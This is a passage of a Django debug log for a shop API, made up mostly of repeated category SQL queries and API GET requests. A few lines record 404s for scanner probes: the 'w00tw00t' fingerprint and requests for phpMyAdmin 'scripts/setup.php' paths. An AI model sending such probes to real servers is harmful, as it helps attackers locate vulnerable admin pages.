"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:36:39,440 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:36:39,442 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:36:39,444 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:36:39,446 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:36:39,449 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:36:39,453 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:36:39,455 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:36:39,458 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:36:39,460 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:36:39,462 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:36:39,465 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:36:39,467 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:36:39,471 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:36:39,473 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-16 07:36:39,474 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:36:39,478 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) [16/Dec/2019 07:36:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:36:39,483 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:36:39,487 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:36:39,491 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:36:39,495 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:36:39,498 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:36:39] "GET /api/v1/categories/big-fire HTTP/1.0" 200 15396 Not Found: /w00tw00t.at.blackhats.romanian.anti-sec:) [16/Dec/2019 07:36:44] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.0" 404 6716 Not Found: /phpmyadmin/scripts/setup.php [16/Dec/2019 07:36:44] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /pma/scripts/setup.php [16/Dec/2019 07:36:44] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [16/Dec/2019 07:36:44] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 DEBUG 2019-12-16 07:37:42,252 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:37:42,259 utils 20136 140506432534272 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:37:42,270 utils 20136 140506422044416 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:37:42,280 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:37:42,285 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:37:42,289 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:37:42,292 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:37:42,293 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:37:42,303 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:37:42,307 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:37:42,309 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:37:42,313 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:37:42,315 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:37:42,319 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:37:42,321 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:37:42,325 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:37:42,334 utils 20136 140506422044416 (0.009) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:37:42,334 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:37:42,349 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:37:42,354 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:37:42,358 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:37:42,362 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:37:42,366 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:37:42,366 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:37:42,375 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:37:42,375 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:37:42,384 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:37:42,384 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:37:42,396 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:37:42,398 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:37:42,400 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:37:42,404 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:37:42,404 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:37:42,409 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:37:42,409 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:37:42,416 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:37:42,419 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:37:42,425 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:37:42,431 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:37:42,435 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:37:42,435 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:37:42,441 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:37:42,444 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:37:42,447 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:37:42,447 utils 20136 140506422044416 (0.001) SELECT 